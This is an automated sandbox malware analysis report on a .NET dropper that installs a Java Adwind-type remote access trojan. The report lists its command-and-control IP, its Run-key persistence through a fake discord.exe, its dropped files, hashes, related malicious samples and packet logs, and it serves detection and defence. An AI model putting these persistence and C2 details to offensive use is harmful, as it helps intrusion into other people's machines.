                                              http://www.jiyu-kobo.co.jp/jp/S3zoj9Uts0.exe, 00000000.00000003.327272852.000000000631B000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326796781.0000000006314000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.326523012.0000000006319000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.quovadisglobal.com/cpsjavaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/cabarga.htmlNS3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://23.94.99.119D8S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.founder.com.cn/cnS3zoj9Uts0.exe, 00000000.00000002.582950062.00000000075A2000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.324091059.0000000006323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.securetrust.com/STCA.crl3#?javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/S3zoj9Uts0.exe, 00000000.00000003.327136589.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers#S3zoj9Uts0.exe, 00000000.00000003.328716911.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.333786625.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.333770966.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000003.333800108.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers8S3zoj9Uts0.exe, 00000000.00000003.329046284.0000000006342000.00000004.00000020.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.582950062.0000000007626000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comceS3zoj9Uts0.exe, 00000000.00000002.582451232.0000000006310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      162.159.138.232
                                                      		canary.discord.comUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      23.94.99.119
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue
                                                      162.159.135.232
                                                      		unknownUnited States
                                                      		13335CLOUDFLARENETUSfalse

                                                      Private

                                                      IP
                                                      192.168.2.1

                                                      General Information

                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:798180
                                                      Start date and time:2023-02-03 20:39:01 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 51s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:S3zoj9Uts0.exe
                                                      Detection:MAL
                                                      Classification:mal100.winEXE@12/3@3/4
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 18
                                                      • Number of non-executed functions: 3
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                      • Execution Graph export aborted for target javaw.exe, PID 3372 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      20:40:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                      20:40:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      162.159.138.232MV TBN CALL PORT FOR LOADING COAL_pdf.exeGet hashmaliciousBrowse
                                                        Invoice-81276.pdf.exeGet hashmaliciousBrowse
                                                          ORIGINAL_BL_INVOICE_PL_.exeGet hashmaliciousBrowse
                                                            3bRSL6ViWV.exeGet hashmaliciousBrowse
                                                              QUOTATION#012523.exeGet hashmaliciousBrowse
                                                                main.exeGet hashmaliciousBrowse
                                                                  KPCPU-231.exeGet hashmaliciousBrowse
                                                                    JzCtXNHXQe.exeGet hashmaliciousBrowse
                                                                      e-dekont20230119.exeGet hashmaliciousBrowse
                                                                        f0pl993Jlv.exeGet hashmaliciousBrowse
                                                                          swift_AAT_C20032244_17-01-2023.exeGet hashmaliciousBrowse
                                                                            AhbLc42WlU.exeGet hashmaliciousBrowse
                                                                              WanHI08oNK.exeGet hashmaliciousBrowse
                                                                                COjMVporx6.exeGet hashmaliciousBrowse
                                                                                  downloader.exeGet hashmaliciousBrowse
                                                                                    Madinat Jumeirah Living Asayel 14782(480).exeGet hashmaliciousBrowse
                                                                                      3rOyn65rNd.exeGet hashmaliciousBrowse
                                                                                        sqDruYnFuz.exeGet hashmaliciousBrowse
                                                                                          EjCC27Oq4M.exeGet hashmaliciousBrowse
                                                                                            Minercart.exeGet hashmaliciousBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              canary.discord.com12057ad2.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              build (2).exeGet hashmaliciousBrowse
                                                                                              • 162.159.136.232
                                                                                              Evo_Spoofer_V2.exeGet hashmaliciousBrowse
                                                                                              • 162.159.135.232
                                                                                              qgMcnt4meR.exeGet hashmaliciousBrowse
                                                                                              • 162.159.128.233
                                                                                              04A31AE8A31BB4144D7392040442F4A38E8301CC55012.exeGet hashmaliciousBrowse
                                                                                              • 162.159.136.232
                                                                                              vrG0FGHo9i.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              DsGo26G94d.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              E3yRg4ob8v.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              iBRa3vP0WB.exeGet hashmaliciousBrowse
                                                                                              • 162.159.137.232
                                                                                              6ZA1oFKiR8.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              duEkTVseyk.exeGet hashmaliciousBrowse
                                                                                              • 162.159.128.233
                                                                                              PMb1MdlBGB.exeGet hashmaliciousBrowse
                                                                                              • 162.159.128.233
                                                                                              5fmulGfQ2b.exeGet hashmaliciousBrowse
                                                                                              • 162.159.137.232
                                                                                              nUBTIa1WRr.exeGet hashmaliciousBrowse
                                                                                              • 162.159.137.232
                                                                                              Pw4sv8JMgF.exeGet hashmaliciousBrowse
                                                                                              • 162.159.135.232
                                                                                              4G6DrDxQk5.exeGet hashmaliciousBrowse
                                                                                              • 162.159.136.232
                                                                                              oilQDAuiBH.exeGet hashmaliciousBrowse
                                                                                              • 162.159.128.233
                                                                                              48aITmz4vp.exeGet hashmaliciousBrowse
                                                                                              • 162.159.137.232
                                                                                              kEtjx4XwPd.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              CLOUDFLARENETUSQ5GN0fA8VQ.elfGet hashmaliciousBrowse
                                                                                              • 188.114.96.94
                                                                                              https://ipfs.io/ipfs/QmV5gNiwiin4C1wgqoymu9yvip9d74JSgsMtNSUasA9RgM?filename=g45-0gjr-w9hgn-w9djvgf-ethg-w9jgnf-9e3whrg-9j-9jff.htmlGet hashmaliciousBrowse
                                                                                              • 104.18.10.207
                                                                                              BJF4s7vOG9.exeGet hashmaliciousBrowse
                                                                                              • 188.114.96.3
                                                                                              mXLu3mpemv.elfGet hashmaliciousBrowse
                                                                                              • 172.68.237.107
                                                                                              https://ipfs.io/ipfs/bafkreihy36r32y5p6hxym7q7ocxusf4syhsbyhbz77rtvz7xdsfs6crnrm/#colin.pewarchuk@nfigroup.comGet hashmaliciousBrowse
                                                                                              • 172.67.74.213
                                                                                              2023-Hinckleyallen-Financial Report.htmlGet hashmaliciousBrowse
                                                                                              • 104.17.25.14
                                                                                              2023-Hinckleyallen-Financial Report.htmlGet hashmaliciousBrowse
                                                                                              • 104.17.24.14
                                                                                              https://docuspropls.durable.coGet hashmaliciousBrowse
                                                                                              • 104.17.25.14
                                                                                              file.exeGet hashmaliciousBrowse
                                                                                              • 188.114.96.3
                                                                                              bJyw.exeGet hashmaliciousBrowse
                                                                                              • 104.20.67.143
                                                                                              INVOICE_(Q322) ready for review JAN 31 2023 1000AM.htmGet hashmaliciousBrowse
                                                                                              • 104.18.28.91
                                                                                              file.exeGet hashmaliciousBrowse
                                                                                              • 188.114.96.3
                                                                                              FOB Shenzhen price for its MOQ.scr.exeGet hashmaliciousBrowse
                                                                                              • 104.21.64.20
                                                                                              https://webforms.ebizcharge.net/EBizSecureForm.aspx?pid=ecdf3fe8-6f71-448f-b913-169e94f58de6Get hashmaliciousBrowse
                                                                                              • 172.67.38.66
                                                                                              https://ipfs.io/ipfs/QmbugYFxQci7be4Trg2Ty2gTWeLRcnoP1gY6EicXTbG4Jd?filename=auto.html#Acarlson@drinkbodyarmor.comGet hashmaliciousBrowse
                                                                                              • 104.18.10.207
                                                                                              https://sourceforge.net/projects/processhacker/files/processhacker2/processhacker-2.39-setup.exe/downloadGet hashmaliciousBrowse
                                                                                              • 104.26.7.139
                                                                                              new_order_quotation_030022023000000000000000_PDF.exeGet hashmaliciousBrowse
                                                                                              • 104.21.58.223
                                                                                              shipping document.exeGet hashmaliciousBrowse
                                                                                              • 172.67.202.57
                                                                                              Benefits_Enrollment.htmGet hashmaliciousBrowse
                                                                                              • 104.18.10.207
                                                                                              https://compassgrp.durable.coGet hashmaliciousBrowse
                                                                                              • 104.17.25.14

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://ipfs.io/ipfs/QmV5gNiwiin4C1wgqoymu9yvip9d74JSgsMtNSUasA9RgM?filename=g45-0gjr-w9hgn-w9djvgf-ethg-w9jgnf-9e3whrg-9j-9jff.htmlGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              file.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              file.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              file.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              XBrRZqGsEO.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              Fatura_8486472023.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              CV.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              Msconcepts22..........pdf.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              RFQ ORDER-T2190-CVE97.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              Msconcepts.............PDF.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              kIZkIsqBSq.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              AWB NO. 8148557141.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              2rOFsW8MAO.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              New Order.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              USD 46947,6 20230101162552.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              SecuriteInfo.com.Win32.PWSX-gen.23219.24986.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              e-dekont-20230127.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              PO-1012023.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              NEW PO.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232
                                                                                              DOC.exeGet hashmaliciousBrowse
                                                                                              • 162.159.138.232
                                                                                              • 162.159.135.232

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):57
                                                                                              Entropy (8bit):4.959654268360928
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:oFj4I5vpN6yUe5WXGWn:oJ5X6y/WFn
                                                                                              MD5:48D10D11F1787C80AADF2E0043214DDC
                                                                                              SHA1:F2202BA0791E73919884DD3E0166BC1BA2C7C942
                                                                                              SHA-256:B924E5CDAF328D4B9D3EEAF9EEEAC941A2ABAA677FA36CC78975610679FCB4E1
                                                                                              SHA-512:570D337FD219AA2740202747BA906B6647B49959636586D2D389CE2E14FED3A834E0895B03C0AC58B6E77E7129603AC7D916F3BE5DA549D73B4E1B93997F38A8
                                                                                              Malicious:false
                                                                                              Preview:C:\Program Files (x86)\Java\jre1.8.0_211..1675453223679..

                                                                                              C:\Users\user\AppData\Local\Temp\jarva.jar

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                              Category:dropped
                                                                                              Size (bytes):655029
                                                                                              Entropy (8bit):7.961141310029578
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:pfl6Qk/o6QPy74HygORXgg/FRv+xM2NiRxgEhyR6b3Wu42ZcSvHDss:pf0QAAPm4SrXgg/S9iROmDWu1ZfvHDss
                                                                                              MD5:1B43933EF9FF4C07BD28E0A2466E9028
                                                                                              SHA1:B2371764235AED9407E6720DF619616F5FA5FBEB
                                                                                              SHA-256:0DFE638F3FFDFD9729EB8C03E033D56B3D0BA20860D06EE18BE1EB82537F0D5D
                                                                                              SHA-512:12BC6853D94B905EADA99D51CEA6F2B4D91F00B3E96E96057608C2FB102C0D8EF215C8666594B1D041DF2629227A284414A11AAE650C32E3451FB96BEB445F66
                                                                                              Malicious:false
                                                                                              Preview:PK..........9V............D...IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIllIllllIIlIIII.class.<.@.G.......[.YPDD..*.x..D.....VD.....J.XcL.11....D...K.&.$...)........B.....x.v...k....9....>BH.A..@[..V.U^n.+G......(d..<N+..:..'..f3..#....q....q#..,*.5..RZ.f..-.qd@.Er..hd.9.c.*i5..8!..;......V....d8..`rp....f.....!"r....j5m.n..I.p..Z^PS...Z.d[d.2...Z..lC....dUM../GB..Q.............jK++...G......-.U..\D{..q....$....V....f&...Ix"Cq../B....82.b..f..r..H:...w.N.#..b.|......e...&.I..b"..+.Y.gF.#...E.......pmm..Bw..E.H..8a.vq+A.$.#..-.$.#..........|3.I.H,......k*.3..v..L...Z./G::.V..(..q.E..$...].....b.iv.;&..HOW.h...t.7.d..l...)1.7.N;z0..f..H.e......z...=B.F....U(.P.n"id.G.[<2.l.UXYQ[PZQ.YT..).....3I... # #...&..Z........S..(2.D....}:..5....o.v{]6.....Cg..9.A..i...>.+....).$.L0a.MDyk..=......d2..;.|;..!'....y;..^.t....#a.On.G...V...d.mK.L...2.../-Fo...............=.<.._.7..?6..G.@L......g`'......)....). ..UwQ..B..#..P=..f.................7Fr%j.G.

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):30720
                                                                                              Entropy (8bit):3.8570021095495353
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:bUpQt9rSl/xAaKRgJ6SoIrkvwKwq6u/oB:bBt9rwdCAt
                                                                                              MD5:94CCB92B775297F357670ABD1E6F754B
                                                                                              SHA1:50A9D6F7828C193C965FF9C5DF8BC290B06122A8
                                                                                              SHA-256:A4C3028EDDEA3F36439B4B4ABA7C1511F7B39DD0A92F38A282968D259D8E3286
                                                                                              SHA-512:A324DB4CB3027AD032096C429832955741DED336585F952B6C6FCB15C781CEAA25307981CF3A2708B2E4DC55610D7B487E492490BC08524EF2ACB5ADE6CFB34A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{i............"...0..n..........~.... ........@.. ....................................`.................................*...O.......................................8............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................^.......H........)..............hF..0E..........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........~.....+..*".(.....*Vs....(....t.........*...}.....(.......(......{....%o ...r;..p(!...o"....*..*..*..ru..p(#...&.{....%o ...($...r...p(%...o"....*..r...p(#...&.{....%o ...($...r...p(%...o"....*..*&..(&....*..*...0..+.........,..{.......+....,...{....o'.......((....*..0..........

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):3.8570021095495353
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:S3zoj9Uts0.exe
                                                                                              File size:30720
                                                                                              MD5:94ccb92b775297f357670abd1e6f754b
                                                                                              SHA1:50a9d6f7828c193c965ff9c5df8bc290b06122a8
                                                                                              SHA256:a4c3028eddea3f36439b4b4aba7c1511f7b39dd0a92f38a282968d259d8e3286
                                                                                              SHA512:a324db4cb3027ad032096c429832955741ded336585f952b6c6fcb15c781ceaa25307981cf3a2708b2e4dc55610d7b487e492490bc08524ef2acb5ade6cfb34a
                                                                                              SSDEEP:384:bUpQt9rSl/xAaKRgJ6SoIrkvwKwq6u/oB:bBt9rwdCAt
                                                                                              TLSH:65D2B61337BC8726E57527B95CA2C2800F75AE276854FE5F68C530BE1EF27008652B6B
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{i............"...0..n..........~.... ........@.. ....................................`................................

                                                                                              File Icon

                                                                                              Icon Hash:00828e8e8686b000

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x408c7e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xD901697B [Tue May 15 07:00:11 2085 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8c2a0x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x5d4.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8b980x38.text
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x6c840x6e00False0.23980823863636364data3.845469484279824IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xa0000x5d40x600False0.4329427083333333data4.173971589658777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xc0000xc0x200False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_VERSION0xa0900x344data
                                                                                              RT_MANIFEST0xa3e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.423.94.99.1194969813372853044 02/03/23-20:40:09.381307TCP2853044ETPRO TROJAN Java/Adwind Variant CnC Activity496981337192.168.2.423.94.99.119

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Feb 3, 2023 20:39:59.012223959 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:39:59.145278931 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:39:59.145379066 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:39:59.146704912 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:39:59.274133921 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:39:59.274185896 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:39:59.274229050 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:39:59.274260044 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:39:59.274290085 CET804969623.94.99.119192.168.2.4
